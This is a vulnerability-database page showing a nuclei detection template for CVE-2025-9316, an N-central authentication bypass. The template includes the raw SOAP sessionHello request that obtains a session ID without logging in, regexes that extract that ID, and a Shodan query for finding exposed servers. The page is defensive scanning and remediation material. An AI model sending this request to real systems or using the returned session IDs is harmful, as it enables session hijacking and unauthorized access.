Lucene search
K

N-central - Authentication Bypass

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

N-central before 2025.4 allows unauthenticated sessionID generation, enabling session hijacking; upgrade to 2025.4.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Improper Restriction of XML External Entity Reference in N-Able N-Central
29 Jan 202608:40
githubexploit
Circl
CVE-2025-9316
18 Nov 202518:14
circl
CNNVD
N-able N-central 安全漏洞
12 Nov 202500:00
cnnvd
CVE
CVE-2025-9316
12 Nov 202515:27
cve
Cvelist
CVE-2025-9316 N-central unauthenticated sessionID generation
12 Nov 202515:27
cvelist
EUVD
EUVD-2025-131915
12 Nov 202518:31
euvd
Metasploit
N-able N-Central Authentication Bypass and XXE Scanner
12 Dec 202518:56
metasploit
NVD
CVE-2025-9316
12 Nov 202516:15
nvd
Positive Technologies
PT-2025-46665
12 Nov 202500:00
ptsecurity
Rapid7 Blog
Rapid7 Detection Coverage for Iran-Linked Cyber Activity
11 Mar 202617:31
rapid7blog
Rows per page
id: CVE-2025-9316

info:
  name: N-central - Authentication Bypass
  author: DhiyaneshDK,horizon3ai
  severity: medium
  description: |
    N-central < 2025.4 can generate sessionIDs for unauthenticated users This issue affects N-central: before 2025.4.
  impact: |
    Attackers can hijack sessions without authentication, potentially leading to unauthorized access.
  remediation: |
    Update to version 2025.4 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9316
    - https://github.com/horizon3ai/n-able_n-central_xxe_file_read/blob/main/ncentral_xxe_file_read.py
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.title:"N-central Login"
  tags: cve,cve2025,n-central,session-leak,vkev

http:
  - raw:
      - |
        POST /dms/services/ServerUI HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        Soapaction: ""

        <?xml version="1.0" encoding="UTF-8"?>
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
          <soapenv:Body>
            <sessionHello>
              <applianceID>3</applianceID>
            </sessionHello>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "SessionID"
          - "sessionHelloResponse"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '<SessionID[^>]*>(\d+)</SessionID>'
          - '<sessionId>(\d+)</sessionId>'
          - '<sessionID>(\d+)</sessionID>'
# digest: 490a0046304402206c171624ce3f00e1d73d26724772a32058b51c552e7fa45148417ab15d94d1f902206e4a888fc7ffb3f689f69e3817509f8fdb74bd6479cd6c341fbf51d621f30613:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 46.9
EPSS0.37335
SSVC
13